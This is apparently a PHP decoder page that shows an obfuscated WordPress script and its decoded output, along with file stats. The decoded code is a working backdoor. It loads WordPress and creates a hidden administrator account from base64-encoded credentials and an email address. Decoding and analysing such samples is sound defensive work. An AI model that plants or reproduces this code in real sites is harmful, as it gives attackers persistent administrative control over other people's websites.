Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php require_once("../wp-load.php" );$n = base64_decode("d29yZHByZXNzYXV0bw==");$p = b..
Decoded Output download
<?php
require_once("../wp-load.php" );$n = base64_decode("d29yZHByZXNzYXV0bw==");$p = base64_decode("d29yZHByZXNzcWQyMDE2");$e = base64_decode("b3Bwb25lcGllY2UwMHh4MDBAZ21haWwuY29t");if (!username_exists($n) && !email_exists($e)) {$u = wp_create_user($n, $p, $e);if (is_int($u)) {(new WP_User($u))->set_role(base64_decode("YWRtaW5pc3RyYXRvcg=="));}} ?>
Did this file decode correctly?
Original Code
<?php
require_once("../wp-load.php" );$n = base64_decode("d29yZHByZXNzYXV0bw==");$p = base64_decode("d29yZHByZXNzcWQyMDE2");$e = base64_decode("b3Bwb25lcGllY2UwMHh4MDBAZ21haWwuY29t");if (!username_exists($n) && !email_exists($e)) {$u = wp_create_user($n, $p, $e);if (is_int($u)) {(new WP_User($u))->set_role(base64_decode("YWRtaW5pc3RyYXRvcg=="));}}
Function Calls
None |
Stats
MD5 | 51404fb26636c23b4996ddb790263c8e |
Eval Count | 0 |
Decode Time | 60 ms |